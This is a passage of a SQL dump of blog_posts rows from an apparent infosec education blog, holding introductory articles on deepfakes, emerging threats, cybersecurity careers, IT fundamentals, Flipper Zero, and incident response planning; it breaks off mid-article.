They lack the sophistication needed to detect dynamic or subtle anomalies in video/audio files generated by deepfake technology.\n\n## Prevention and Detection: Tools and Strategies\n\nStaying ahead of deepfake threats requires proactive strategies and cutting-edge tools. Here’s what cybersecurity professionals recommend:\n\n### 1. Use Deepfake Detection Tools\n\nAI-powered detection tools like Sensity.ai, Deepware Scanner, and Microsoft’s Video Authenticator analyze videos and audio for signs of manipulation.\n\n### 2. Enhanced Biometric Authentication\n\nImplement multi-modal biometric verification, combining face, voice, behavior, and iris detection for secure confirmation.\n\n### 3. Blockchain for Media Authentication\n\nUse blockchain to track the provenance of digital media files, including timestamps and metadata verification. Companies like Truepic are paving the way for secure media authentication.\n\n### 4. Training and Awareness\n\nEducate employees and individuals on recognizing potential deepfake scams and phishing attempts. Awareness remains one of the most important defenses.\n\n### 5. Regulatory Frameworks and Collaboration\n\nAdvocate for tighter regulations surrounding the use and creation of AI-generated content. Governments, tech firms, and cybersecurity agencies must work collectively to combat deepfake misuse.\n\n## The Future of Deepfakes and Cybersecurity\n\nDeepfake technology will only continue to evolve, offering even more realistic forgeries in the years to come. But with new defensive innovations also emerging, professionals in cybersecurity, policy-making, and tech industries still have an opportunity to minimize harm.\n\nFor instance, advancements in real-time detection algorithms and ethical AI standards may reduce their potential applications in cybercrime. 
Massive investments in media verification technologies are also gearing up to seal vulnerabilities.\n\n## Staying Ahead of the Curve\n\nThe risks posed by deepfakes to cybersecurity are real and growing. However, by staying informed, investing in preventative measures, and relying on innovative detection tools, individuals and organizations can counteract these threats effectively.\n\nAt the heart of cybersecurity is a principle that has always been true: education and preparation go hand-in-hand.', '', 'http://infoseclabs.io/uploads/1767564733348-245296497.jpeg', 'Illustration of deepfake technology impacting cybersecurity with video manipulation', 1, 'published', '2026-01-04 09:12:00', '2026-01-05 01:12:33', 'Information Security', 'Deepfakes: A New Cybersecurity Threat', 'Explore how deepfakes pose cybersecurity risks and learn strategies to combat these AI threats.', 'Deepfakes'),
(16, 'Exploring the Future of Cybersecurity: Emerging Threats and Tech Innovations', 'exploring-the-future-of-cybersecurity-emerging-threats-and-tech-innovations', '# The Future of Cybersecurity: Emerging Threats and Technological Advancements\n\nThe cybersecurity landscape is evolving faster than ever before, fueled by rapid technological advancements and an expanding digital footprint. From data breaches targeting small businesses to sophisticated state-sponsored attacks, the need for robust cybersecurity has never been greater. But what does the future hold for cybersecurity? This blog dives deep into emerging threats, groundbreaking technologies, and the skills required to combat cybercrime in the years ahead.\n\n## The Current State of Cybersecurity\n\nCybersecurity has become a top priority for businesses, governments, and individuals worldwide. A report by IBM Security reveals that the average cost of a data breach in 2023 reached $4.45 million, underscoring the financial and reputational damage caused by cyberattacks.\n\nThe challenges, however, are multifaceted. Ransomware attacks have surged, phishing campaigns are more sophisticated than ever, and vulnerable Internet of Things (IoT) devices have expanded the attack surface. While organizations are investing heavily in cybersecurity tools, the landscape continues to shift, demanding constant vigilance and innovation to stay ahead.\n\n## Emerging Cybersecurity Threats\n\nThe future of cybersecurity is shaped largely by the threats we face today and those emerging on the horizon. Below are the key threats to watch as we look to the future:\n\n### 1. AI-Powered Cyberattacks\n\nArtificial intelligence has revolutionized several industries, and unfortunately, cybercriminals are no exception. 
AI can be weaponized to launch more sophisticated and targeted attacks, such as:\n\n- **Deepfake Scams**: AI-generated videos and audio can convincingly impersonate individuals, leading to fraud, corporate espionage, or disinformation campaigns.\n- **Automated Phishing**: AI can create highly personalized phishing emails at scale, making them more convincing and effective.\n- **Adversarial Machine Learning**: Cyberattackers manipulate AI models used in cybersecurity systems, rendering them ineffective.\n\n### 2. IoT Vulnerabilities\n\nThe Internet of Things is set to grow to over **75 billion connected devices by 2025**, according to Statista. While IoT devices bring convenience and efficiency, their lack of robust security measures makes them prime targets for hackers. Attackers can exploit vulnerabilities in smart home devices, medical equipment, and industrial machinery, causing widespread disruptions and even endangering lives.\n\n### 3. Quantum Computing Risks\n\nQuantum computers have the potential to break traditional encryption protocols, threatening the security of sensitive data across industries. Although quantum computing is still in its early stages, experts warn that malicious actors and even nation-states are exploring its potential to outpace current encryption technologies.\n\n### 4. Supply Chain Attacks\n\nCybercriminals are increasingly targeting supply chains as a weak link in organizational defenses. By inserting malicious code into software updates or third-party vendor systems, attackers can gain access to larger networks, impacting multiple organizations simultaneously.\n\n### 5. The Rise of Geopolitical Cyberwarfare\n\nNation-states are engaging in cyberwarfare to disrupt critical infrastructure, steal intellectual property, and manipulate public opinion. 
These politically motivated attacks could become more frequent and destructive, especially as geopolitical tensions escalate.\n\n## Technological Advancements Shaping the Future\n\nWhile cyber threats proliferate, advancements in technology hold tremendous promise for enhancing cybersecurity. Here are some of the cutting-edge technologies poised to redefine cybersecurity:\n\n### 1. AI in Threat Detection\n\nAI is not just a tool for cybercriminals; it’s also a powerful defense mechanism. Advanced AI algorithms can analyze vast streams of data in real-time to detect anomalies, predict potential attacks, and respond to threats before they can cause damage.\n\nFor example, machine learning-based security systems can identify unusual patterns of behavior, like unauthorized access attempts, and automatically isolate affected systems to prevent breaches.\n\n### 2. Blockchain for Secure Transactions\n\nBlockchain technology, known for powering cryptocurrencies like Bitcoin, is being leveraged for secure data sharing and decentralized authentication. By recording transactions in a tamper-proof ledger, blockchain reduces the risk of data breaches and ensures transparency.\n\nBlockchain is particularly promising for financial institutions, healthcare providers, and supply chain networks that require traceable and secure transactions.\n\n### 3. Zero Trust Architecture\n\nThe \"trust no one\" principle is gaining traction in cybersecurity through Zero Trust Architecture. This approach ensures that every user, device, and application is continuously verified before being granted access, minimizing the risk of insider threats and unauthorized access.\n\n### 4. Biometric Authentication\n\nTraditional passwords are rapidly being replaced by biometric authentication methods such as fingerprint scanning and facial recognition. These systems offer a higher level of security as they are harder to replicate or steal.\n\n### 5. 
Post-Quantum Cryptography\n\nWith the threat of quantum computing on the horizon, researchers are developing post-quantum cryptography methods to secure sensitive information. These encryption protocols are designed to withstand attacks from quantum computers, ensuring data remains protected in the future.\n\n## Skills and Training for the Cybersecurity Workforce\n\nThe success of future cybersecurity efforts will depend heavily on skilled professionals equipped to address evolving challenges. Here’s how organizations can empower their workforce:\n\n### 1. Prioritize Continuous Learning\n\nThe cybersecurity field is dynamic, and professionals need to stay up-to-date with the latest tools, technologies, and threat landscapes. Certifications like Certified Information Systems Security Professional (CISSP) and Certified Ethical Hacker (CEH) are valuable for keeping skills sharp.\n\n### 2. Develop AI Expertise\n\nUnderstanding how AI operates, including its strengths and vulnerabilities, will be essential for combating AI-driven attacks. Training programs that focus on integrating AI into cybersecurity strategies are critical.\n\n### 3. Promote Ethical Hacking\n\nEthical hackers, or white-hat hackers, play a vital role in identifying vulnerabilities before malicious actors can exploit them. Organizations should invest in ethical hacking programs to bolster their defenses.\n\n### 4. Foster Diversity and Inclusion\n\nA diverse workforce brings fresh perspectives and innovative problem-solving approaches. Encouraging inclusivity in cybersecurity hiring practices enhances the industry\'s capabilities overall.\n\n## Predictions and Recommendations for the Future\n\nCybersecurity will only grow more complex in the coming years. 
Here are some key predictions and actionable recommendations for businesses and professionals looking to stay ahead:\n\n- **Prediction 1**: AI-based cybersecurity systems will become the industry standard within the next five years.\n  - **Recommendation**: Invest in AI-driven solutions now to future-proof your organization against emerging threats.\n\n- **Prediction 2**: Regulations and compliance requirements will tighten globally.\n  - **Recommendation**: Stay informed about legislation like GDPR and CCPA, and ensure your security frameworks meet compliance standards.\n\n- **Prediction 3**: Cybersecurity insurance will become a necessity.\n  - **Recommendation**: Secure a comprehensive cybersecurity insurance plan to mitigate potential risks and financial losses.', '', 'http://infoseclabs.io/uploads/1767564873422-280949463.jpg', 'Digital lock symbolizing cybersecurity with tech icons', 1, 'published', '2026-01-04 17:14:00', '2026-01-05 01:14:39', 'Information Security', 'Emerging Tech & Its Impact on Cybersecurity', 'Explore how emerging technologies like AI & IoT shape the future of cybersecurity and introduce new threats.', 'Emerging technologies'),
(17, 'Unlocking Cybersecurity: Alternative Career Paths Beyond Pentesting', 'unlocking-cybersecurity-alternative-career-paths-beyond-pentesting', '# Exploring Diverse Careers in Cybersecurity\n\nCybersecurity is often synonymous with penetration testing, or \"pentesting.\" It\'s an exciting career that involves identifying vulnerabilities in systems by attempting to \"hack\" into them before malicious actors do. However, while pentesting grabs the spotlight, the field of cybersecurity is far more diverse than many realize.\n\nIf you\'re an IT professional, a cybersecurity enthusiast, or exploring a career pivot, this guide will introduce you to some rewarding alternative careers in cybersecurity. Whether you\'re looking to escape the competitive pentesting job market or discover a role that better suits your skills, you\'re in for an eye-opening exploration of options.\n\n## Why Look Beyond Pentesting?\n\nPentesting is a well-known cybersecurity role, but its popularity has its downsides. The market for pentesters has become more saturated in recent years, making it harder to break into or advance in the field. Additionally, professionals in this space sometimes report less financial fulfillment than they anticipated.\n\nThe good news? Cybersecurity is an incredibly dynamic field with options that extend far beyond pentesting, offering paths that are equally impactful, lucrative, and in demand.\n\n## Top Alternative Careers in Cybersecurity\n\nHere are some lesser-known roles worth exploring in this exciting industry, complete with insights into their responsibilities, required skills, and career potential.\n\n### 1. Security Engineer\n\n**What They Do:**\n\nSecurity engineers focus on designing, building, and maintaining robust security systems and protocols to protect organizations from cyber threats. 
Instead of identifying vulnerabilities like pentesters, they proactively build defenses to avert attacks.\n\n**Key Skills:**\n\n- Familiarity with security tools and products.\n- Experience in systems integration and implementation.\n- Problem-solving and troubleshooting expertise.\n\n**Career Opportunities:**\n\nMany security engineers take on roles in pre-sales or post-sales for organizations, helping customers adopt security solutions effectively. With businesses scaling their digital footprints, these professionals are in high demand.\n\n### 2. Security Operations Center (SOC) Analyst\n\n**What They Do:**\n\nSOC analysts monitor an organization\'s network in real-time, watching for suspicious behavior and responding to security incidents. They operate on the front lines of cybersecurity defense, mitigating risks as they arise.\n\n**Progression Levels:**\n\nSOC analysts typically begin at Level 1 (entry-level), where they monitor activity and flag threats. With experience, they can move into Level 2 or Level 3 roles, which involve complex investigations and response strategies.\n\n### 3. Cybersecurity Solution Architect\n\n**What They Do:**\n\nCybersecurity solution architects design high-level frameworks that secure organizational infrastructure. They ensure that systems are scalable and resilient to evolving threats.\n\n**Key Skills:**\n\n- Deep understanding of both cybersecurity and IT infrastructure.\n- Ability to identify risks and proactively mitigate them using effective designs.\n- Proficiency in cybersecurity tools and enterprise systems.\n\nFor those with a knack for strategy and technology, this role offers tremendous growth opportunities.\n\n### 4. Governance, Risk, and Compliance (GRC) Specialist\n\n**What They Do:**\n\nA GRC specialist helps organizations meet regulatory standards, enforce policies, and minimize risks. 
They often play an advisory role by conducting audits, managing compliance frameworks, and ensuring the organization aligns with laws like GDPR or SOX.\n\n**Why It’s Rewarding:**\n\nCompliance isn’t just about ticking boxes; it’s about building trust, mitigating financial risks, and enabling long-term business success.\n\n### 5. Cybersecurity Auditor\n\n**What They Do:**\n\nCybersecurity auditors evaluate an organization’s security measures, identifying vulnerabilities and providing recommendations to improve. Their work ensures that systems are safe, efficient, and compliant with industry standards.\n\n**Required Skills:**\n\n- Expertise in audit compliance protocols.\n- Strong risk management capabilities.\n- Analytical mindset for identifying gaps in existing security measures.\n\n### 6. Cloud Security Specialist\n\n**What They Do:**\n\nAs more businesses migrate their operations to the cloud, cloud security specialists are tasked with safeguarding sensitive data and securing cloud-based platforms. They implement access controls, monitor for threats, and ensure systems are compliant with cloud regulations.\n\n**Why It Matters:**\n\nCloud expertise is in short supply, making this one of the most sought-after roles in cybersecurity today.\n\n## Making the Transition\n\nEager to branch out into one of these roles? Here’s how to make a seamless transition into your ideal cybersecurity career.\n\n### Build Foundational IT Skills\n\nIf you’re new to cybersecurity, start with roles like system administrator, software developer, or helpdesk technician. These will provide a solid foundation in IT and networking principles.\n\n### Specialize and Gain Certifications\n\nCertifications are often a critical stepping stone in cybersecurity. 
Some valuable ones include:\n\n- **CISSP (Certified Information Systems Security Professional):** Perfect for advanced roles like cybersecurity architect or GRC specialist.\n- **CISM (Certified Information Security Manager):** Ideal for governance and compliance roles.\n- **CEH (Certified Ethical Hacker):** Helpful if you want to enhance your penetration testing skills or transition into a SOC analyst role.\n\n### Gain Practical Experience\n\nHands-on experience is vital. Look for internships, contribute to open-source projects, or invest in lab environments like TryHackMe and Hack The Box.\n\n### Stay Current Through Continuous Learning\n\nCybersecurity evolves rapidly. Attend webinars, follow cybersecurity blogs, and participate in niche forums or events like Black Hat or DEF CON. Staying ahead requires staying informed.\n\n## A Rewarding Cybersecurity Career Awaits\n\nCybersecurity is an expansive field with opportunities far beyond pentesting. Whether you become a security engineer, cloud security specialist, or GRC expert, each role offers its own challenges and rewards.\n\nThe key is to explore your interests, focus on building the right skills, and stay adaptable in this ever-changing industry. By doing so, you’ll not only advance your career but also play a critical role in safeguarding the digital world.', '', 'http://infoseclabs.io/uploads/1767564951123-96955238.png', 'Various cybersecurity professionals collaborating in an office setting', 1, 'published', '2026-01-04 09:15:00', '2026-01-05 01:19:09', 'Information Security', 'Explore Cybersecurity Careers Beyond Pentesting', 'Discover diverse, rewarding cybersecurity careers beyond pentesting. Explore roles like Security Engineer, SOC Analyst, and more.', 'Cybersecurity Careers');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(18, 'Kickstart Your Cybersecurity Career: Essential IT Fundamentals You Need to Know', 'kickstart-your-cybersecurity-career-essential-it-fundamentals-you-need-to-know', '# Kickstart Your Cybersecurity Career: Mastering IT Fundamentals\n\nAre you intrigued by the dynamic world of cybersecurity but unsure how to take the first step? A successful career in cybersecurity begins with mastering the fundamentals of IT. Understanding the essential concepts of hardware, software, networking, applications, and basic security practices not only lays a strong foundation but also equips you to tackle real-world challenges with confidence.\n\nThis guide will walk you through why IT knowledge is indispensable for cybersecurity, the core areas you need to focus on, how to acquire these skills, and the exciting career paths you can pursue in this field.\n\n## Why IT Fundamentals Matter for Cybersecurity\n\nBefore you can secure technology, you need to understand how it works. IT fundamentals give you the essential skills to configure and troubleshoot hardware, grasp how networking facilitates communication, identify vulnerabilities in systems and applications, and comprehend core cybersecurity principles.\n\nThink of IT knowledge as the stepping stone to your cybersecurity career. For instance, without a solid understanding of how a Layer 2 switch operates, implementing port security on that switch would be nearly impossible. Similarly, familiarity with operating systems like Windows or Linux is crucial for effectively deploying advanced tools and processes in the future.\n\nUnderstanding IT gives you the power to analyze and resolve technical issues, secure systems proactively, and build innovative solutions to protect sensitive information.\n\n## The Five Core Categories of IT Fundamentals\n\nTo build a strong IT foundation, focus on mastering these five categories. Each one plays a critical role in shaping your cybersecurity expertise.\n\n### 1. 
Hardware\n\nLearn the physical components of computers, such as processors, memory, and storage. Knowing how hardware works enables you to identify and resolve potential issues like faulty wiring or overheating. Mastering hardware configuration also sets the stage for securing physical devices against unauthorized access.\n\n### 2. Software\n\nExplore the world of operating systems and applications. Understand the basics of programs like word processors, browser clients, and operating systems such as Windows, macOS, and Linux. Gaining this knowledge allows you to analyze how software functions, which is vital for identifying vulnerabilities or misconfigurations.\n\n### 3. Networking\n\nNetworking is the backbone of modern communication, making it a critical area to understand. Learn how devices connect, share resources, and transfer data across networks. Concepts like IP addresses, protocols, and network topologies are key to identifying potential points of failure or attack.\n\n### 4. Applications\n\nApplications are the tools we use daily to accomplish specific tasks. From email clients to customer relationship management (CRM) software, understanding how applications interact with operating systems and hardware is crucial to ensuring their security and performance.\n\n### 5. Security Basics\n\nNo system is entirely free of risk. Security fundamentals teach you to recognize vulnerabilities, assess risks, and implement proactive defenses. Gain insight into best practices for password management, encryption, and patch updates to minimize threats.\n\nThese building blocks ensure that you have a comprehensive understanding of technology before advancing into more complex cybersecurity concepts.\n\n## Essential Skills to Acquire\n\nAspiring cybersecurity professionals should focus on acquiring specific IT skills that directly apply to real-world challenges. 
Here are a few necessary skills to get you started:\n\n- **Hardware Configuration**: Assemble and troubleshoot computer systems to fully understand their physical components.\n- **Operating System Management**: Learn how to install, configure, and maintain OS environments like Windows and Linux.\n- **Network Troubleshooting**: Gain practical knowledge in diagnosing and resolving connectivity issues.\n- **Threat Identification**: Learn how to spot and mitigate security threats, such as malware or phishing attempts.\n- **Ethical Hacking**: Understand the basics of offensive security measures, such as penetration testing, in a controlled and ethical environment.\n\nThese skills not only make you well-rounded but also prepare you to specialize in areas like digital forensics or penetration testing.\n\n## How to Learn IT Fundamentals\n\nFortunately, there’s a wealth of resources to help you learn IT fundamentals and cybersecurity basics. Whether you prefer structured courses or hands-on practice, there’s something for everyone.\n\n### Online Platforms\n\n- **FreeCodeCamp** offers free, beginner-friendly lessons on IT basics.\n- **Udemy** has courses like [Complete Introduction to Cybersecurity](https://udemy.com/course/complete-introduction-to-cybersecurity) by Grant Collins, which covers IT and cybersecurity fundamentals for beginners.\n- **YouTube** provides in-depth tutorials from trusted sources like Google and online tech communities.\n\n### Certification Programs\n\nCertifications validate your knowledge and show employers that you’re serious about your career. Consider starting with foundational credentials like CompTIA IT Fundamentals (ITF+) or Cisco’s CCNA certification.\n\n### Community Engagement\n\nJoin online communities, attend webinars, and participate in live Q&A sessions. 
Groups like Cybercademy provide career advice, security projects, and support networks for professionals and students.\n\n### Hands-On Practice\n\nSet up virtual environments, like Kali Linux virtual machines, to experiment safely. Test tools and configurations to gain real-world experience.\n\nPractical projects not only enhance your technical skills but also build confidence as you apply theoretical knowledge to solve problems.\n\n## Cybersecurity Career Paths\n\nOnce you’ve mastered the basics, you’ll be ready to explore specialized roles within cybersecurity. Here are some popular career paths to consider:\n\n### Security Analyst\n\n- **Responsibilities**: Monitor and analyze security threats, respond to incidents, and implement security measures.\n- **Skills Needed**: Incident response, threat analysis, and knowledge of SIEM tools.\n\n### Network Engineer\n\n- **Responsibilities**: Design, implement, and maintain secure network architectures.\n- **Skills Needed**: Networking protocols, firewall configuration, and VPN setup.\n\n### Cybersecurity Consultant\n\n- **Responsibilities**: Assess organizational security risks, provide recommendations, and develop strategies to safeguard systems.\n- **Skills Needed**: Risk assessment, policy development, and regulatory compliance knowledge.\n\nEach role offers unique challenges and opportunities, allowing you to make a meaningful impact by defending businesses against cyber threats.\n\n## Start Building Your Cybersecurity Knowledge\n\nCybersecurity is an exciting and rewarding field, but a clear foundational knowledge is essential for success. Understanding IT fundamentals equips you with the skills and confidence needed to tackle advanced cybersecurity concepts down the line.\n\nBegin your educational journey today with resources that fit your learning style. 
Whether through online courses, practice projects, or community interactions, consistent learning and hands-on experience will pave the way for a successful cybersecurity career.', '', 'http://infoseclabs.io/uploads/1767565249662-511498932.jpeg', 'Person studying IT fundamentals for cybersecurity career', 1, 'published', '2026-01-04 09:19:00', '2026-01-05 01:20:50', 'Information Security', 'Start Your Cybersecurity Career: IT Essentials', 'Discover essential IT fundamentals to launch a successful cybersecurity career. Learn hardware, software, networking, and more.', 'IT fundamentals'),
(19, 'Flipper Zero: The Ultimate Starter Tool for Aspiring Cybersecurity Experts?', 'flipper-zero-the-ultimate-starter-tool-for-aspiring-cybersecurity-experts', '# Exploring Cybersecurity: Is Flipper Zero the Right Starting Point?\n\nIf you\'re venturing into the vast world of cybersecurity, you\'ve probably encountered the term \"Flipper Zero.\" This versatile device has gained popularity among ethical hackers, tech hobbyists, and security enthusiasts. With a sleek design and an adorable dolphin mascot, Flipper Zero is a portable hacking tool capable of exploring, analyzing, and interacting with various digital systems. But is it the best choice for beginners, or are there better alternatives for starting your cybersecurity journey?\n\nThis blog will guide you by exploring Flipper Zero\'s capabilities, assessing its pros and cons for beginners, and introducing alternative ways to build strong foundational skills in cybersecurity.\n\n## Is Flipper Zero a Good Starting Point for Cybersecurity?\n\nTo put it simply, Flipper Zero can be *a tool*, but it might not be *the tool* to begin your cybersecurity exploration. Let\'s break it down.\n\n### What Is Flipper Zero?\n\nFlipper Zero is a multifunctional device designed primarily for security testing and research. It leverages common communication protocols like RFID, NFC, infrared, and Bluetooth, making it useful for learning how these technologies function and exploring their vulnerabilities. 
With Flipper Zero, you can analyze signals, capture data packets, and even experiment with embedded hardware such as radio frequencies.\n\n### Pros of Starting with Flipper Zero\n\n- **Hands-on Insight into Various Technologies:** Flipper Zero offers real-world exposure to communication protocols such as RFID and NFC.\n- **Portable and Beginner-Friendly:** Its playful interface is unintimidating, making it a fun starting point for beginners with a tech affinity.\n- **Affordable Entry into Hardware Hacking:** Compared to high-end hardware hacking tools, Flipper Zero is relatively budget-friendly.\n- **Community Support:** The Flipper Zero community is active and ready to help new users experiment and troubleshoot.\n\n### Cons of Starting with Flipper Zero\n\n- **Limited Learning Scope for Beginners:** While it\'s great for hardware hacking, Flipper Zero doesn’t cover critical cybersecurity foundations like ethical hacking principles, network security basics, or malware analysis.\n- **Steep Learning Curve Without Context:** Without a foundational understanding of cybersecurity concepts, beginners may find the tool intimidating or struggle to use it meaningfully.\n- **Risk of Misuse:** Depending on where and how it\'s used, Flipper Zero may unintentionally steer newcomers toward ethically ambiguous practices.\n\n**Bottom Line:** While Flipper Zero is an excellent supplementary tool for intermediate users or those with technical know-how, it’s not an all-encompassing resource for beginners. You\'ll need additional learning pathways to properly establish a clear cybersecurity foundation.\n\n## What Are the Best Alternatives for Beginners?\n\nIf you’re just starting, opting for tools and platforms designed to teach foundational cybersecurity concepts might be a better path. Here are some beginner-friendly resources you can explore.\n\n### 1. Learning Platforms and Tutorials\n\n- **Hack The Box:** A platform with hands-on labs tailored for all skill levels. 
They offer challenges ranging from simple exercises to complex simulations.\n- **TryHackMe:** Beginner-friendly tutorials that incorporate guided instructions and hands-on challenges to get you started with ethical hacking and cybersecurity concepts.\n- **Cybrary:** A learning hub with free and paid courses on penetration testing, digital forensics, and more.\n- **Codecademy and FreeCodeCamp:** Great for learning programming languages like Python, which is crucial in cybersecurity.\n\n### 2. Open Source Tools\n\n- **Kali Linux:** One of the most popular operating systems for penetration testing and ethical hacking.\n- **Wireshark:** Essential for network analysis and learning how data moves across systems.\n- **Metasploit Framework:** A penetration testing tool perfect for learning about exploit techniques and system vulnerabilities.\n\n### 3. Beginner-Friendly Devices\n\nIf you’re interested in hardware hacking specifically, consider starting with simpler tools like Raspberry Pi or Arduino. These low-cost, flexible devices allow you to experiment with IoT (Internet of Things) security and basic electronics hacking before jumping to multi-functional tools like Flipper Zero.\n\n## Create a Structured Learning Path\n\nA thoughtful learning path will help you build a solid foundation and maintain consistent progress. Here\'s a simple roadmap to get started.\n\n### Step 1. Learn the Basics\n\nStart with free cybersecurity primers or videos on platforms like YouTube. Specifically, look into topics such as:\n\n- What is cybersecurity?\n- Understanding common threats (e.g., phishing, malware, ransomware).\n- Introduction to ethical hacking principles.\n\n### Step 2. Get Certified\n\nEarning certifications is a great way to build credentials and structure your learning. 
Here are beginner-friendly certifications to consider:\n\n- **CompTIA Security+:** A certification that covers network security fundamentals.\n- **Certified Ethical Hacker (CEH):** A foundational course to help you understand ethical hacking practices.\n- **Certified Information Systems Security Professional (CISSP):** Not a beginner credential—it requires five years of paid, hands-on security work experience—so treat it as a longer-term goal once you are already working in the field.\n\n### Step 3. Choose a Specialization\n\nCybersecurity spans many fields, including network security, malware analysis, penetration testing, and cloud security. Once you\'ve learned the basics, explore various fields to find what interests you the most.\n\n### Step 4. Hands-On Practice\n\nApply your knowledge by solving challenges, participating in Capture The Flag (CTF) competitions, or, once you are confident, hunting for bugs through bug bounty programs on HackerOne or Bugcrowd. Keep in mind that bug bounty targets are real, live systems rather than simulations, so read each program’s scope and rules of engagement carefully and stay strictly within them.\n\n## Why Hands-On Experience Matters\n\nTheory can only take you so far. Gaining practical experience will help you develop key problem-solving skills and confidence. Start small—for example, use Wireshark to inspect the traffic on your own home network (only ever capture traffic on networks you own or are authorized to monitor). Platforms like Hack The Box and TryHackMe are also excellent for setting up virtual labs where you can safely practice without real-world consequences.\n\n## Connect with the Cybersecurity Community\n\nOne of the most underrated tools for success? Networking. Engaging with experienced people in cybersecurity can expose you to valuable advice, job opportunities, and learning resources.\n\n### Communities to Join\n\n- **Cybersecurity Subreddits (e.g., r/AskNetsec):** Great for asking questions or discussing cybersecurity trends.\n- **LinkedIn Groups:** Connect with professionals and stay updated on industry news. 
\n\nEngage with these communities to enhance your learning and career prospects in cybersecurity.', '', 'http://infoseclabs.io/uploads/1767565511958-305863866.png', 'Flipper Zero device showcasing its interface and dolphin mascot', 1, 'published', '2026-01-04 17:24:00', '2026-01-05 01:25:21', 'Information Security', 'Flipper Zero: Best Beginner Tool for Cybersecurity?', 'Discover if Flipper Zero is ideal for cybersecurity beginners. Explore its pros, cons, and alternatives to start your journey.', 'Flipper Zero'),
(20, 'Why Every Organization Needs an Incident Response Plan for Cybersecurity', 'why-every-organization-needs-an-incident-response-plan-for-cybersecurity', '# What Is an Incident Response Plan (IRP) and Why Does Your Business Need One?\n\nIn today’s fast-paced digital landscape, cyber threats are becoming more advanced, and businesses can no longer afford to be reactive about cybersecurity. A single data breach or ransomware attack can bring operations to a halt, costing millions and damaging your reputation.\n\nThis is where an **Incident Response Plan (IRP)** comes in. Think of it as your organization’s cybersecurity playbook—a guide to managing and mitigating the damage caused by cyberattacks. A well-crafted IRP not only minimizes downtime but also ensures faster recovery, saving your business time, money, and stress.\n\nThis guide will explain why an IRP is essential, how it protects your business from cyber threats, and the steps to create, test, and improve it.\n\n---\n\n## Why Is an Incident Response Plan Important?\n\nWithout a solid plan in place, businesses are left scrambling to deal with cyberattacks, leading to chaos, delays, and greater financial losses. An **Incident Response Plan** is the backbone of effective cybersecurity, helping businesses stay resilient against threats. Here’s why every organization needs one:\n\n### 1. Minimize Downtime\n\nEvery second counts during a cyberattack. A strong IRP gives your team clear steps to follow, reducing system downtime and restoring operations quickly.\n\n### 2. Reduce Financial and Reputational Damage\n\nCyberattacks can result in regulatory fines, business losses, and a tarnished brand image. A swift and transparent response, guided by an IRP, can minimize these impacts.\n\n### 3. Ensure Regulatory Compliance\n\nMany industries require organizations to have an IRP as part of their cybersecurity measures. 
For example, companies under **GDPR**, **HIPAA**, or similar regulations must demonstrate they have plans in place to manage data breaches—GDPR, for instance, requires notifying the supervisory authority within 72 hours of becoming aware of a personal-data breach, a deadline that is very hard to meet without a rehearsed plan.\n\n### 4. Boost Customer Trust\n\nClients trust companies that can handle cyber threats effectively. A demonstrated ability to respond to incidents builds confidence and strengthens customer relationships.\n\n### 5. Reduce Stress for IT Teams\n\nCybersecurity teams face enormous pressure during an attack. An IRP eliminates the guesswork, helping them make better decisions and reducing stress.\n\n---\n\n## Components of an Effective Incident Response Plan\n\nA great IRP is more than a document—it’s a strategic guide with clear roles, processes, and actionable steps. Here are the key elements:\n\n### 1. Team Roles and Responsibilities\n\nDefine who does what during an incident. Your team may include an Incident Response Manager, IT Security Analysts, Communication Managers, and legal advisors.\n\n### 2. Incident Identification and Classification\n\nEstablish criteria for identifying incidents and their severity levels. Knowing whether a threat is minor or critical helps prioritize resources.\n\n### 3. Actionable Playbook for Threats\n\nOutline specific steps for containment, eradication, and recovery, and make evidence preservation (retaining logs, capturing disk and memory images) an explicit step before eradication so the root cause can still be established afterwards. Include backup options in case primary systems fail.\n\n### 4. Communication Protocols\n\nPlan how to share information during a crisis, both internally (IT team, executives, employees) and externally (customers, partners, regulators), and agree in advance on an out-of-band channel in case corporate email or chat is itself compromised.\n\n### 5. Legal and Compliance Requirements\n\nDocument steps to meet legal obligations, such as notifying affected users or regulatory bodies of a data breach within the required timeline.\n\n### 6. Post-Incident Review\n\nInclude a process for reviewing incidents to identify weaknesses and improve future responses.\n\n---\n\n## How to Create an Incident Response Plan\n\nBuilding an effective IRP takes time and planning. Here are the essential steps:\n\n### Step 1. 
Assess Your Cybersecurity Risks\n\nIdentify your organization’s vulnerabilities. Are ransomware attacks, phishing scams, or insider threats more likely? Understanding your risks is the foundation of your plan.\n\n### Step 2. Identify Critical Assets\n\nList the most important assets to protect, such as customer data, intellectual property, or systems critical to daily operations.\n\n### Step 3. Assemble Your Incident Response Team (IRT)\n\nForm a team with defined roles, including IT staff, legal advisors, and PR experts to manage internal and external communications.\n\n### Step 4. Write a Threat Response Playbook\n\nCreate detailed steps for handling specific threats, such as ransomware, DDoS attacks, or phishing. Keep the instructions clear and easy to follow.\n\n### Step 5. Set Up Incident Documentation\n\nDevelop a system to log incidents, track how they were detected, and record steps taken to resolve them. This helps improve future responses.\n\n### Step 6. Train Employees\n\nTrain all employees—not just IT—on how to recognize and report potential threats. Cybersecurity is a team effort, and awareness is key.\n\n---\n\n## Testing and Improving Your Incident Response Plan\n\nAn IRP needs regular testing and updates to remain effective in the face of evolving cyber threats. Here’s how to keep it up to date:\n\n### 1. Simulate Real Attacks\n\nConduct mock phishing campaigns, malware simulations, or tabletop exercises to test how well your team responds.\n\n### 2. Gather Feedback\n\nAfter a test or real incident, ask your team what worked and what didn’t. Use this input to refine your plan.\n\n### 3. Update Regularly\n\nCyber threats and technologies evolve quickly. Update your IRP to include lessons learned, new tools, and regulatory changes.\n\n### 4. Track Key Metrics\n\nMonitor how long it takes to detect, contain, and recover from incidents. Set goals to improve these response times.\n\n### 5. 
